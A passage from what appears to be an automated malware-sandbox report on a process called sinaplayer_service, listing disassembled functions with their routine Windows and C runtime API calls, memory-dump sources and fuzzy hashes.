                                                                                                                                                                                                    • API String ID: 4005446296-0
                                                                                                                                                                                                    • Opcode ID: f047b3b8917ef8afaca1d5cc9e4759888e7c213a11ad4629958d6515ce23e713
                                                                                                                                                                                                    • Instruction ID: 332e7a3b16e1dabb7f48a516dfe803a106583e904d91d813b7a8e6836cdc39a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f047b3b8917ef8afaca1d5cc9e4759888e7c213a11ad4629958d6515ce23e713
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0216874604749DFCB22CF28D948B9ABBF8FB09304F10461EE80597790D7B6AA04CB90
                                                                                                                                                                                                    Function 6C5CA80B Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6C5CA830
                                                                                                                                                                                                      • Part of subcall function 6C5B8D76: _SpinWait.LIBCMT(?,?,6C5BF2B2,00000000), ref: 6C5B8D8E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6C5CA84D
                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::GetInternalContext.LIBCMT ref: 6C5CA859
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 6C5CA874
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base::Concurrency::details::ContextInternalSpin$Concurrency@@DeferredGroupOnce@?$_PrepareScheduleSchedulerSegmentWaitWait@$00@details@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328162323-0
                                                                                                                                                                                                    • Opcode ID: 72c04a8b022af9b7f9df1829d02f588f8785d51ca473d01a49140bd0b15881ba
                                                                                                                                                                                                    • Instruction ID: 6c7640aac722b0bf5126d6430277ed9a996a5854cffa9aa798e8bf36507a88ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72c04a8b022af9b7f9df1829d02f588f8785d51ca473d01a49140bd0b15881ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED118F756047049FC711DEA5CCD0966BBB5EB85258B00452DE95147B50DB31EC4ACFA2
                                                                                                                                                                                                    Function 0038EAA0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0038EAAA
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00000002,00000000,00000000), ref: 0038EAC9
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00100002,00000000,00000000), ref: 0038EAF2
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00100000,00000000,00000000), ref: 0038EB13
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DuplicateHandle$CurrentProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 322452111-0
                                                                                                                                                                                                    • Opcode ID: e84e082d910aa7428202d560276b705dffe1f4d2051b7b23e2e97206df7f8913
                                                                                                                                                                                                    • Instruction ID: bb58bb04d8cef71c38ca25da773b3e785cf4403c365153ca2eefc17414860f6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e84e082d910aa7428202d560276b705dffe1f4d2051b7b23e2e97206df7f8913
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97116172240304BBDB21DF95DD46FABB7ACFB0DB10F10415AFA4596190D762F811D760
                                                                                                                                                                                                    Function 0037E9C0 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 0037EA12
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,00000000), ref: 0037EA2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037EA3F
                                                                                                                                                                                                    • ??1SimpleThread@base@@UAE@XZ.BASE ref: 0037EA62
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037EAFE
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037EB22
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037EB5C
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: GetCurrentThreadId.KERNEL32 ref: 0037EB96
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: GetTickCount.KERNEL32 ref: 0037EBB3
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EBD0
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037EBF3
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EC04
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037EC1E
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: OutputDebugStringA.KERNEL32(00000000,?), ref: 0037EC42
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$??3@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@CountCurrentD@std@@@1@@DebugFileOutputPath@base@@SimpleStringThreadThread@base@@TickV01@@V?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2929469033-0
                                                                                                                                                                                                    • Opcode ID: 051b5575c9903fca558e406672fcc26a6d0ec8f70cb34def990b7f72f69191dd
                                                                                                                                                                                                    • Instruction ID: f5288b0118356a3205c46a6950b9f12b449cacdddde89b3613a29429c42e716d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 051b5575c9903fca558e406672fcc26a6d0ec8f70cb34def990b7f72f69191dd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE1103B190464AEFDF12CF59C804B9EFBB8FF06310F0042AAE81597790D7766A14CB91
                                                                                                                                                                                                    Function 0038E380 Relevance: 6.1, APIs: 4, Instructions: 52timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenProcess.KERNEL32(10000000,00000000,?), ref: 0038E393
                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 0038E3B8
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038E3D0
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038E3E5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEventProcess$OpenTimes
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2811004771-0
                                                                                                                                                                                                    • Opcode ID: 20a4e682bf9ec8bd41540e60b7a5024ffbf0a9be613a8f6028cdcbe4604a9569
                                                                                                                                                                                                    • Instruction ID: 6e6ebdd0e9c6863efbab7210574751ae6f2869ba40e10ff5960e04fb955f1e61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20a4e682bf9ec8bd41540e60b7a5024ffbf0a9be613a8f6028cdcbe4604a9569
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4018471640705ABEB259BA59C47FEA77B8EB08700F00055EFA06E76C0EAB2F8448B54
                                                                                                                                                                                                    Function 6C57CFF8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C57CFFF
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000004,6C57D125,00000000,?,00000001,?), ref: 6C57D02E
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000001,00000004,6C57D125,00000000,?,00000001,?), ref: 6C5A3978
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,00000003,00000004,6C57D125,00000000,?,00000001,?,?,00000001), ref: 6C5A399F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 738859832-0
                                                                                                                                                                                                    • Opcode ID: f6525cb6e3928029d0d61742981a25fce162b11b5b786ed7000ad85f0c0f1878
                                                                                                                                                                                                    • Instruction ID: 84668fe7d22a6e9e8dab6ae2adb149e84611e0608aa31409c817803f27db5e19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6525cb6e3928029d0d61742981a25fce162b11b5b786ed7000ad85f0c0f1878
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3017971400208ABEB258F22CC04BAA3BB5AF81318F249508FD404A9B1E776ADD5DB21
                                                                                                                                                                                                    Function 003748AC Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003748B7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 003748D4
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?,8285FFAB,?), ref: 003748E5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?), ref: 003748F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionThrowmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1404817050-0
                                                                                                                                                                                                    • Opcode ID: 6eacf1f443b75783908e3eb2858bb5bb35de3059511b917fbe00df6bf2863a26
                                                                                                                                                                                                    • Instruction ID: 42dc2b2692428d8b37c74e13778b3f4eb018724c2b031be0bcc789ea87adb7f2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eacf1f443b75783908e3eb2858bb5bb35de3059511b917fbe00df6bf2863a26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 210188B2924704AFDB31DF28D88171AB7F5EF01300F00096ED889D7210E736A918CBA2
                                                                                                                                                                                                    Function 0038EBB0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038E550: UnregisterWaitEx.KERNEL32(?,000000FF,00000063,0038E8E3,00000001), ref: 0038E55D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038EBD2
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038EBDF
                                                                                                                                                                                                      • Part of subcall function 0038F650: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,0038EBF7,?), ref: 0038F691
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0038EBF8
                                                                                                                                                                                                      • Part of subcall function 0038E570: UnregisterWaitEx.KERNEL32(?,000000FF,00000063,?,0038E8DC,00000001), ref: 0038E586
                                                                                                                                                                                                      • Part of subcall function 0038E270: UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E284
                                                                                                                                                                                                      • Part of subcall function 0038E270: UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E297
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2AE
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2B8
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C2
                                                                                                                                                                                                      • Part of subcall function 0038E270: ??_V@YAXPAX@Z.MSVCR120(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,?,?), ref: 0038EC13
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: UnregisterWait$CloseCriticalHandleSection$??3@Leave$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 616177342-0
                                                                                                                                                                                                    • Opcode ID: 79858601a8874eb94fdbf1bced61ed0274b2f675518ffbd2e41e5c5de505436d
                                                                                                                                                                                                    • Instruction ID: 7d71bec66498c3539d4da086a2c2d5eb8258c2cc4b13741a67a3109763ad7b35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79858601a8874eb94fdbf1bced61ed0274b2f675518ffbd2e41e5c5de505436d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF02832200700A7C7137755EC45EBF7BAD8FC2320F04047AFA0686250EB25E946D3E5
                                                                                                                                                                                                    Function 0038EC30 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorEventFileLastReadmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1263425661-0
                                                                                                                                                                                                    • Opcode ID: 614f7335f957adb6b5d282dcabe46898ef5907594ae165f271901c46b6da3d3b
                                                                                                                                                                                                    • Instruction ID: 6cf69295e9b8410f70b0ab7a303fa7897825d722b5383761f8cf00de530de6e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614f7335f957adb6b5d282dcabe46898ef5907594ae165f271901c46b6da3d3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201A271600605BBE7129B75EC0EB9ABBACFB45314F100156F908C2590DBB1A92697E1
                                                                                                                                                                                                    Function 6C57E996 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C57E9CC
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                      • Part of subcall function 6C570477: _fileno.MSVCR120(?,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C57047F
                                                                                                                                                                                                      • Part of subcall function 6C570477: _isatty.MSVCR120(00000000,?,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C570485
                                                                                                                                                                                                      • Part of subcall function 6C570477: __p__iob.MSVCR120(0000FFFF,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C570491
                                                                                                                                                                                                      • Part of subcall function 6C570477: __p__iob.MSVCR120(0000FFFF,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C5704A1
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C57E9F2
                                                                                                                                                                                                      • Part of subcall function 6C57E98E: _unlock_file.MSVCR120(?,6C57EA06), ref: 6C57E98F
                                                                                                                                                                                                    • _errno.MSVCR120(6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C5A5CBA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C5A5CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 169382274-0
                                                                                                                                                                                                    • Opcode ID: 7d1168d8fb668f89ae1565e2654f72598cc696891d6341ce7728b4015807ae7f
                                                                                                                                                                                                    • Instruction ID: deab5fd5ff2d825e61b4a63df19d1ed6133f04a0fe9e9e6e22f1bdc78953d2a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d1168d8fb668f89ae1565e2654f72598cc696891d6341ce7728b4015807ae7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92014F71901245FFDB119FB18C04BEF36A1BF81368F504529E8209AB90DB78C9569BA1
                                                                                                                                                                                                    Function 00371243 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037124E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0037126B
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?,8285FFAB,?), ref: 00371279
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?), ref: 00371289
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionThrowmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1404817050-0
                                                                                                                                                                                                    • Opcode ID: 18da5e5de87d18377df82ac96a263908e3cbf9f5847e644e339fec4c9ece2bfd
                                                                                                                                                                                                    • Instruction ID: 2fc46f403a911074b1f920503f249ad8011ddffced15e830f4720c2e87f159e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18da5e5de87d18377df82ac96a263908e3cbf9f5847e644e339fec4c9ece2bfd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D018FB29147409FEB369F58D44571AFBE1EB11700F000E6DD8CAAB6C2E3B66944C7A2
                                                                                                                                                                                                    Function 0038E4E0 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time__aulldiv$FileSystem_i64tow_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3004546483-0
                                                                                                                                                                                                    • Opcode ID: a024249f8d00c401c5d1b33db63b77d1760fb90bab331b6cfaf95603f3ac689f
                                                                                                                                                                                                    • Instruction ID: 70628a6eedb59f50ec215b548c4e2a18c92659d70f201689b4817a80bb496905
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a024249f8d00c401c5d1b33db63b77d1760fb90bab331b6cfaf95603f3ac689f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F0A4B6A40304BFE7249FA8DD46F5A77BCAB84712F004259FA05A72C0D6B0B5048AA5
                                                                                                                                                                                                    Function 00388040 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
